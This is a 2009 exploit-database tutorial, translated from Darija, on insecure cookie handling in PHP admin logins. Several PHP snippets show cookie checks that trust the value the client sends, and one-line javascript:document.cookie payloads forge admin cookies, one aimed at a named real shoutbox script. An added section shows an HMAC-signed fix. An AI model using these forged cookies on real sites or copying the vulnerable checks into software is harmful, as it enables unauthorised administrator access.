[Morocco] Playing with cookies (ST1)

EDB-ID: 12954
CVE: N/A
Author: Stack
Type: papers
Platform: Multiple
Date: 2009-02-27

  |=--------------------------------------------------------------------=|
  |=-------------=[  Playing with cookies (ST1) (Morocco)  ]=-----------=|
  |=-----------------------=[ 25 February 2009 ]=-----------------------=|
  |=---------------------=[  By Mountassif Moad  ]=---------------------=|
  |=--------------------------------------------------------------------=|
    
                ###########      Sons of the homeland, Moroccans till death      ##########
######
 Info
######
###########################################################################
[+]                                                                       
[+] Language : Morocco darija
[+]
[+] By       : Mountassif Moad   (Stack)          
[+]
[+] Website  : www.v4-team.com
[+]
[+] Date     : 2009-02-25
[+]
[+] MilHome  : http://www.milw0rm.com/author/1331
[+]                                                                       
###########################################################################

##########
 Contents
##########
[0x00] - Introduction
[0x01] - Presentation
[0x02] - Conclusion
[0x03] - Greetings to
[0x04] - Credits

#######################
 [0x00] - Introduction
#######################
Peace be upon you. Today I had some free time, so I said to myself: come on, let's explain
to the sons of the homeland how we find the flaws in cookies,
the ones we call Insecure Cookie Handling Vulnerability.
I wrote the damn thing in Darija so that only the sons of the homeland understand it,
and to hell with those other monkeys you and I both know,
the ungrateful ones. Let them get lost; we explain in Darija so they won't understand a thing :d and whoever wants to understand can learn Darija
hahaha
##########
[0x01] - Presentation
##########
-----
1
-----
Anyway, we start with a check in PHP

code php 1 :
if ($_COOKIE["login"] == "OK")
{
    // the cookie alone decides whether the visitor is the admin
    header("location: admin.php");
}
else
{
    // the rest of the PHP page
    echo "lekmala diyale la page php ";
}

Here the code checks whether the cookie value (login=OK)
is stored in your browser.
If it finds it, it sends you on to the page admin.php, and if the cookie is not
correct it carries on with the page and you do not get into admin.
Let's try it on a live example
-----
2
-----
This one : http://www.milw0rm.com/exploits/5845
Download it from here : http://www.zeldaforums.net/scripts/myshoutpro1.2.zip
Anyway, we open the file admin.php; at line 37 there is this code

code php 2 :
<?php
$admin_cookie=$_COOKIE['admin_access'];
if($admin_cookie == "") {
?>
So here we see that $admin_cookie = admin_access
and there is an (if), meaning
$admin_cookie == ""  - = -  admin_access == ""
"" = empty: the code only checks whether the cookie is empty, so any value will do
so it becomes

admin_access=0
exploit : javascript:document.cookie = "admin_access=0; path=/";
After you execute the exploit you will get the message
You are logged in. Click here to proceed.
You click and you are in admin

-----
3
-----
Now let's move on to another piece of code

code php 3 :

if ($user == $username && $pass == $password){
    // after a correct login the cookie is set to a fixed value
    setcookie("login", "OK", time());
}

Here we focus on this line    =>  setcookie("login", "OK", time());

setcookie is a PHP function; if you want to read about it, see http://fr.php.net/setcookie
This function defines what gets sent to the browser as a cookie,
and since here there are just two words, which are
login & OK
it could just as well be written like this

setcookie("login", "OK")

Anyway, the exploit for this one is also easy, just like the previous ones
Exploit: javascript:document.cookie = "login=OK; path=/";
----
4
----

code php 4 :

$user=$_POST['username'];
$pass=$_POST['password'];
// read the admin account from the database
$select_admin = mysql_query("SELECT * FROM cms_admin");
while($dati_admin=mysql_fetch_array($select_admin)){
    $username=$dati_admin['username'];
    $password=$dati_admin['password'];
}
if ($user == $username && $pass == $password){
    // the cookie value is the admin's username
    setcookie("login", $username, time());
}

Here the matter is a little trickier, so let's explain this code

setcookie("login", $username, time());

Here we notice that there is a variable $username
This variable $username = username,
which is the admin's username.
So for the vulnerability to work for us we have to supply the admin's username.
For example, if the admin's username = administrator
then the exploit will look like this

Exploit: javascript:document.cookie = "login=administrator; path=/";
 
----
5
----

code php 5 :

Roughly like this

$user=$_POST['username'];
$pass=$_POST['password'];
// read the admin account from the database
$select_admin = mysql_query("SELECT * FROM cms_admin");
while($dati_admin=mysql_fetch_array($select_admin)){
    $username=$dati_admin['username'];
    $password=$dati_admin['password'];
}
if ($user == $username && $pass == $password){
    // the cookie value is the md5 hash of the admin's username
    setcookie("login", md5($username), time());
}

This code is like the code in example 4,
but here there is one addition, which is hashing with md5.
Look at this line with me

   setcookie("login", md5($username), time());

setcookie we have already explained.
login is the name of the cookie that the setcookie function will send.
md5($username) means the username hashed with md5.
So if the admin username is not md5-hashed here, we will not get into the admin panel,
and the exploit will look like this

Exploit: javascript:document.cookie = "login=200ceb26807d6bf99fd6f4f0d1ca54d4; path=/";

administrator = 200ceb26807d6bf99fd6f4f0d1ca54d4
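
Added example, not part of the original paper: every cookie value in examples 1 and 3 to 5 (a constant, the username, the md5 of the username) can be computed by the client, so the fix is to issue a value only the server can compute. The sketch signs the login cookie with HMAC-SHA256 under a server-side key; SECRET, TTL, issue_token and verify_token are names assumed here for illustration.

```php
<?php
// Added example: signed login cookie. SECRET and the helper names are
// hypothetical; load a real random key from server-side configuration.
const SECRET = 'constructed-demo-key-change-me';
const TTL = 3600; // token lifetime in seconds

// Build "username|expiry|mac"; the MAC covers username and expiry.
// Usernames containing "|" are not supported and fail closed on verify.
function issue_token(string $username, int $now): string
{
    $payload = $username . '|' . ($now + TTL);
    return $payload . '|' . hash_hmac('sha256', $payload, SECRET);
}

// Return the username if the token is authentic and unexpired, else null.
function verify_token(string $token, int $now): ?string
{
    $parts = explode('|', $token);
    if (count($parts) !== 3) {
        return null;
    }
    [$username, $expiry, $mac] = $parts;
    $expected = hash_hmac('sha256', $username . '|' . $expiry, SECRET);
    if (!hash_equals($expected, $mac)) {   // constant-time comparison
        return null;
    }
    if (!ctype_digit($expiry) || (int)$expiry < $now) {
        return null;
    }
    return $username;
}

// Constructed demo: the cookie values from examples 1 and 3 to 5 are all
// rejected; only the token issued by the server is accepted.
$now = time();
$good = issue_token('administrator', $now);
$tests = ['OK', 'administrator', md5('administrator'), $good];
foreach ($tests as $cookie) {
    $who = verify_token($cookie, $now);
    printf("%-40.40s => %s\n", $cookie, $who === null ? 'rejected' : "accepted as $who");
}
```

In a real page the token would be sent with setcookie() using the httponly and secure options, or the whole scheme replaced by PHP's server-side sessions so that no login state lives in the cookie value at all.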

-------------------------------------------------------------------------

#######################
 [0x02] - Conclusion
#######################
World-class work, how wonderful. Wait for a video that will be a nice one:
another method for discovering insecure cookies
#######################
 [0x03] - Greetings to
#######################
All Moroccans :d
Especially : Houssamix & simo-soft & djekmani & Gor & Simo64 & Sec-alert & issam & me :d
To the dear Egyptians : darbate mi9asse haji
 
------[ 0x04 - Credits ]
Author: Mountassif Moad
mail: you have no use for it :d
site: http://v4-team.com 

# milw0rm.com [2009-02-27]